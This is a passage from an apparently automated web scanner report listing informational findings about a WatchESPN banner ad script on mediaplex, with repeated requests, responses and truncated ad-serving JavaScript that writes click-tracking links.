document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOwzAMA78SaK4BS5Rtpb9J0moKsmUq.vfSnXgHkPwIIM9lDet4LAKjBKDhNKXISGQfLxRr2Yrvx1H2ur1LpG5uiY5ImdN_uVkd0.bPymxMrwiiE6_7PImdqKw2_f4ABIsbnA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.42. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.43. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De991e960-d53c-497f-80f7-f6aec8bd8584&mpt=e991e960-d53c-497f-80f7-f6aec8bd8584&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4By5JsKb_JYVdBulTB_n3pijMAyY9EaFvCS5V1ISkQF2FXGEOoR3CPmtNlciaNNpLn0dKoez_9uNxcaU5nuVnJbdr8CaQhNYsDFfi89w2sQEbV.PcH7eIbXA--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4By5JsKb_JYVdBulTB_n3pijMAyY9EaFvCS5V1ISkQF2FXGEOoR3CPmtNlciaNNpLn0dKoez_9uNxcaU5nuVnJbdr8CaQhNYsDFfi89w2sQEbV.PcH7eIbXA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e991e960-d53c-497f-80f7-f6aec8bd8584

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De991e960-d53c-497f-80f7-f6aec8bd8584&mpt=e991e960-d53c-497f-80f7-f6aec8bd8584&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4By5JsKb_JYVdBulTB_n3pijMAyY9EaFvCS5V1ISkQF2FXGEOoR3CPmtNlciaNNpLn0dKoez_9uNxcaU5nuVnJbdr8CaQhNYsDFfi89w2sQEbV.PcH7eIbXA--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:14 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5274
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4By5JsKb_JYVdBulTB_n3pijMAyY9EaFvCS5V1ISkQF2FXGEOoR3CPmtNlciaNNpLn0dKoez_9uNxcaU5nuVnJbdr8CaQhNYsDFfi89w2sQEbV.PcH7eIbXA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e991e960-d53c-497f-80f7-f6aec8bd8584" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.44. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D23df0824-b3c4-4d24-b8a2-b2a341c9ccc2&mpt=23df0824-b3c4-4d24-b8a2-b2a341c9ccc2&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BS5QTub9JFHQKumUK.vdSE.8Ako8A8l5m2IrXIjBKABpOU4oYzk8P83YgvflZFLu1w3a45sxMk5pWeRvWt7L6mczB9I4gOvF7XxdxJSqrQ39_52gbTg--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BS5QTub9JFHQKumUK.vdSE.8Ako8A8l5m2IrXIjBKABpOU4oYzk8P83YgvflZFLu1w3a45sxMk5pWeRvWt7L6mczB9I4gOvF7XxdxJSqrQ39_52gbTg--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=23df0824-b3c4-4d24-b8a2-b2a341c9ccc2

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D23df0824-b3c4-4d24-b8a2-b2a341c9ccc2&mpt=23df0824-b3c4-4d24-b8a2-b2a341c9ccc2&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BS5QTub9JFHQKumUK.vdSE.8Ako8A8l5m2IrXIjBKABpOU4oYzk8P83YgvflZFLu1w3a45sxMk5pWeRvWt7L6mczB9I4gOvF7XxdxJSqrQ39_52gbTg--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:05 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BS5QTub9JFHQKumUK.vdSE.8Ako8A8l5m2IrXIjBKABpOU4oYzk8P83YgvflZFLu1w3a45sxMk5pWeRvWt7L6mczB9I4gOvF7XxdxJSqrQ39_52gbTg--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=23df0824-b3c4-4d24-b8a2-b2a341c9ccc2" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.45. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D7e68cc5c-c430-4866-b08e-b2c9948c9dc4&mpt=7e68cc5c-c430-4866-b08e-b2c9948c9dc4&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOgDAMA7.CMlOpbdI04TkEtoqNCfF3XCbfSbYfYqZtcavK60JcIcZcTGAFQv1Ui2iRQjgnMdW0ZzvTXsNdLPwIoTn9y63mPm3.OLIhJbMBBXjdYwAVWFBt5f0A6w8bSw--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOgDAMA7.CMlOpbdI04TkEtoqNCfF3XCbfSbYfYqZtcavK60JcIcZcTGAFQv1Ui2iRQjgnMdW0ZzvTXsNdLPwIoTn9y63mPm3.OLIhJbMBBXjdYwAVWFBt5f0A6w8bSw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=7e68cc5c-c430-4866-b08e-b2c9948c9dc4

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D7e68cc5c-c430-4866-b08e-b2c9948c9dc4&mpt=7e68cc5c-c430-4866-b08e-b2c9948c9dc4&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOgDAMA7.CMlOpbdI04TkEtoqNCfF3XCbfSbYfYqZtcavK60JcIcZcTGAFQv1Ui2iRQjgnMdW0ZzvTXsNdLPwIoTn9y63mPm3.OLIhJbMBBXjdYwAVWFBt5f0A6w8bSw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.6706412732601166&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:09 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOgDAMA7.CMlOpbdI04TkEtoqNCfF3XCbfSbYfYqZtcavK60JcIcZcTGAFQv1Ui2iRQjgnMdW0ZzvTXsNdLPwIoTn9y63mPm3.OLIhJbMBBXjdYwAVWFBt5f0A6w8bSw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=7e68cc5c-c430-4866-b08e-b2c9948c9dc4" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.46. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D5209d2db-57a9-4df5-a89d-f185703b043a&mpt=5209d2db-57a9-4df5-a89d-f185703b043a&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEKxDAMBL8SVJ_B8kqxdL9xMKlCuquO_D3ramdgpL8A8t0y2o7PJmiUADSMphTxVnO2eRTvI4vN08uInOXU8F5xVMOQdbrizrovW3.S61yrCKIR7991EXeiMnV9XtkjGwk-%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEKxDAMBL8SVJ_B8kqxdL9xMKlCuquO_D3ramdgpL8A8t0y2o7PJmiUADSMphTxVnO2eRTvI4vN08uInOXU8F5xVMOQdbrizrovW3.S61yrCKIR7991EXeiMnV9XtkjGwk-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=5209d2db-57a9-4df5-a89d-f185703b043a

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D5209d2db-57a9-4df5-a89d-f185703b043a&mpt=5209d2db-57a9-4df5-a89d-f185703b043a&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEKxDAMBL8SVJ_B8kqxdL9xMKlCuquO_D3ramdgpL8A8t0y2o7PJmiUADSMphTxVnO2eRTvI4vN08uInOXU8F5xVMOQdbrizrovW3.S61yrCKIR7991EXeiMnV9XtkjGwk-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEKxDAMBL8SVJ_B8kqxdL9xMKlCuquO_D3ramdgpL8A8t0y2o7PJmiUADSMphTxVnO2eRTvI4vN08uInOXU8F5xVMOQdbrizrovW3.S61yrCKIR7991EXeiMnV9XtkjGwk-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=5209d2db-57a9-4df5-a89d-f185703b043a" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.47. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Db2181608-6dc7-4885-9e2b-fec84e079dd1&mpt=b2181608-6dc7-4885-9e2b-fec84e079dd1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOxCAQQ68STR0k5gOYHCeBraLtUkV79zWV35Nsv.Iux9Zh1fdN3ChwVwRNKXKaQmtGquNqKYCS.rQzfeaFmLn1MVTWdJVbsdyWrZ_OLMzIDmIQv899EytRWS36.wPU5RsZ%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOxCAQQ68STR0k5gOYHCeBraLtUkV79zWV35Nsv.Iux9Zh1fdN3ChwVwRNKXKaQmtGquNqKYCS.rQzfeaFmLn1MVTWdJVbsdyWrZ_OLMzIDmIQv899EytRWS36.wPU5RsZ&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=b2181608-6dc7-4885-9e2b-fec84e079dd1

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Db2181608-6dc7-4885-9e2b-fec84e079dd1&mpt=b2181608-6dc7-4885-9e2b-fec84e079dd1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOxCAQQ68STR0k5gOYHCeBraLtUkV79zWV35Nsv.Iux9Zh1fdN3ChwVwRNKXKaQmtGquNqKYCS.rQzfeaFmLn1MVTWdJVbsdyWrZ_OLMzIDmIQv899EytRWS36.wPU5RsZ%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:30 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOxCAQQ68STR0k5gOYHCeBraLtUkV79zWV35Nsv.Iux9Zh1fdN3ChwVwRNKXKaQmtGquNqKYCS.rQzfeaFmLn1MVTWdJVbsdyWrZ_OLMzIDmIQv899EytRWS36.wPU5RsZ&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=b2181608-6dc7-4885-9e2b-fec84e079dd1" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.48. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Db566b990-5463-4d4a-a90e-1a028779ee86&mpt=b566b990-5463-4d4a-a90e-1a028779ee86&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4ByfpY6m0c1FvQLVPQu5ee.B5A8iFVeh.VPfR1kHZIqkoaTCB0esRZxc0ttNnHZpvFq8nknmPUWhm0p7s8vPPYtn8K6UhjTaABv_d1AQMoqLr8_rziGrY-%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4ByfpY6m0c1FvQLVPQu5ee.B5A8iFVeh.VPfR1kHZIqkoaTCB0esRZxc0ttNnHZpvFq8nknmPUWhm0p7s8vPPYtn8K6UhjTaABv_d1AQMoqLr8_rziGrY-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=b566b990-5463-4d4a-a90e-1a028779ee86

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Db566b990-5463-4d4a-a90e-1a028779ee86&mpt=b566b990-5463-4d4a-a90e-1a028779ee86&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4ByfpY6m0c1FvQLVPQu5ee.B5A8iFVeh.VPfR1kHZIqkoaTCB0esRZxc0ttNnHZpvFq8nknmPUWhm0p7s8vPPYtn8K6UhjTaABv_d1AQMoqLr8_rziGrY-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.news.com.au/breaking-news?useAbsoluteURL=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:07 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4ByfpY6m0c1FvQLVPQu5ee.B5A8iFVeh.VPfR1kHZIqkoaTCB0esRZxc0ttNnHZpvFq8nknmPUWhm0p7s8vPPYtn8K6UhjTaABv_d1AQMoqLr8_rziGrY-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=b566b990-5463-4d4a-a90e-1a028779ee86" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.49. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

